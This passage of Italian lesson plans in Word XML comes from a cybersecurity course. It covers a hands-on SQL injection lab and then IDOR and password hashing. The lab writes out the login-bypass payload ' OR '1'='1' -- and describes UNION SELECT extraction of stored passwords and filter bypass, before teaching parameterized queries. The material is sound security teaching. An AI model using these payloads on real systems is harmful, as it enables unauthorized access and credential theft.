        <w:t xml:space="preserve">correggere</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con query parametrizzate</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1012"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Capisce perché filtrare gli apici</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">non funziona</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="38"/>
    <w:bookmarkStart w:id="39" w:name="articolazione-minuto-per-minuto-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Articolazione minuto per minuto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053"/>
        <w:gridCol w:w="2933"/>
        <w:gridCol w:w="2933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Tempo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Attività</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Modalità</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:00 – 0:10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Setup lab</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: clone repo</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">ss4i/corso-its-cybersecurity-32h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cd 02_lab/M6_sqli_step_by_step</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, venv,</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">pip install -r requirements.txt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python seed.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lab guidato</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:10 – 0:20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Step 1 del lab</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: avvia</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">python app.py</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, login legittimo con</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">alice@bank.it</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">alice_pass</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. Tutti vedono il saldo.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lab guidato</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:20 – 0:35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Step 2 del lab</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: login bypass live. Tutti digitano</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">' OR '1'='1' --</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">come email. Successo.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">“Cosa è successo?”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lab guidato + discussione</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:35 – 0:50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Spiegazione lavagna</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: la query diventa</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">SELECT ... WHERE email='' OR '1'='1'</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. SQL come</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">mescolanza di struttura e dati</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">. Perché è la vulnerabilità #1 dal 2003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontale + lavagna</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:50 – 1:05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PAUSA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1:05 – 1:25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Step 3 del lab</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: UNION SELECT per estrarre email+password da</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/cerca</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t xml:space="preserve">“Vedete? Avete appena rubato le password di tutti gli utenti.”</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lab guidato</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1:25 – 1:40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Step 4 (rapido)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: dimostrazione che</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">replace("'", "")</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">non basta — bypass con encoding/escape.</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Perché whitelist &gt; blacklist</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lab guidato</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1:40 – 1:55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Step 5 del lab</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: correzione con query parametrizzate</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">?</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">placeholder. Riprovare gli stessi attacchi → falliscono</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Lab guidato</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">1:55 – 2:00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Cross-lang</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: stessa correzione in Java (PreparedStatement), PHP (PDO), JS (better-sqlite3). 1 slide finale</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontale</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="39"/>
    <w:bookmarkStart w:id="40" w:name="Xfd79c30c9e461628e5b8e042d9410bcf2601144"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Esempi cross-lang da mostrare in slide finale</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Python</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"SELECT * FROM users WHERE id = ?"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, (user_id,))</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Java</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">PreparedStatement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ps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conn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prepareStatement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"SELECT * FROM users WHERE id = ?"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ps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setInt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userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// PHP</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$stmt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$pdo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt;prepare(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"SELECT * FROM users WHERE id = ?"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$stmt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-&gt;execute([</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$userId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">])</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// JS</w:t>
      </w:r>
      <w:r>
        <w:br/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stmt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db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prepare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"SELECT * FROM users WHERE id = ?"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user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stmt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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(userId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="40"/>
    <w:bookmarkStart w:id="41" w:name="materiali-per-il-docente-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Materiali per il docente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Repo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ss4i/corso-its-cybersecurity-32h</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">clonato sul proprio PC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lab</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">02_lab/M6_sqli_step_by_step/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">testato la sera prima</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Slide con i 4 esempi cross-lang</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1013"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lavagna per disegnare la query</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“mescolata”</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="41"/>
    <w:bookmarkStart w:id="42" w:name="verifica-in-itinere-2"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verifica in-itinere</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Alla fine,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">chiedi alla classe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Date un payload che bypassa il login senza UNION.”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Perché parametrizzare protegge?”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Se 80% risponde correttamente → ok. Altrimenti recupero in L4.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="42"/>
    <w:bookmarkStart w:id="43" w:name="compito-per-l4"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Compito per L4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Rifare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">il lab a casa da soli (consolidamento)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Leggere sezione 5 della Checklist (Auth e sessione)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1014"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Eseguire i test pytest del lab:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">pytest test_app.py -v</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(sulla versione corretta tutti passano)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="43"/>
    <w:bookmarkStart w:id="44" w:name="errori-da-evitare-1"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Errori da evitare</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">❌ Spiegare la SQLi senza farla provare: si dimentica in 24h</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">❌ Saltare il</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“perché filtrare non basta”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: è il momento didattico più potente</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1015"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">❌ Dimenticare il commit/push della propria versione corretta (per ripartire da pulito a L4)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 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">## L4 — Broken Access Control / IDOR + Password hashing (2h)</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="44"/>
    <w:bookmarkStart w:id="45" w:name="obiettivi-formativi-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Obiettivi formativi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Distingue</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">autenticazione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">da</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">autorizzazione</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Riconosce un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">IDOR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">e sa correggerlo con ownership check</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sa differenziare i status code</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">401 vs 403</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Sa hashare password con</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">bcrypt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1016"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Capisce perché MD5/SHA-256</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">non vanno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">per password</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="45"/>
    <w:bookmarkStart w:id="46" w:name="articolazione-minuto-per-minuto-3"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Titolo3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Articolazione minuto per minuto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053"/>
        <w:gridCol w:w="2933"/>
        <w:gridCol w:w="2933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Tempo</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Attività</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Modalità</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:00 – 0:05</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ripasso L3 (1 domanda + verifica che il lab a casa è funzionante)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Q&amp;A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:05 – 0:15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Autenticazione vs Autorizzazione</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: confronto, esempi (login = authn, vedere fatture proprie = authz)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontale + lavagna</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">0:15 – 0:30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Cos’è IDOR</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">: l’utente loggato cambia l’ID nell’URL e vede risorse altrui. Esempio guidato con</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">/fattura/&lt;id&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
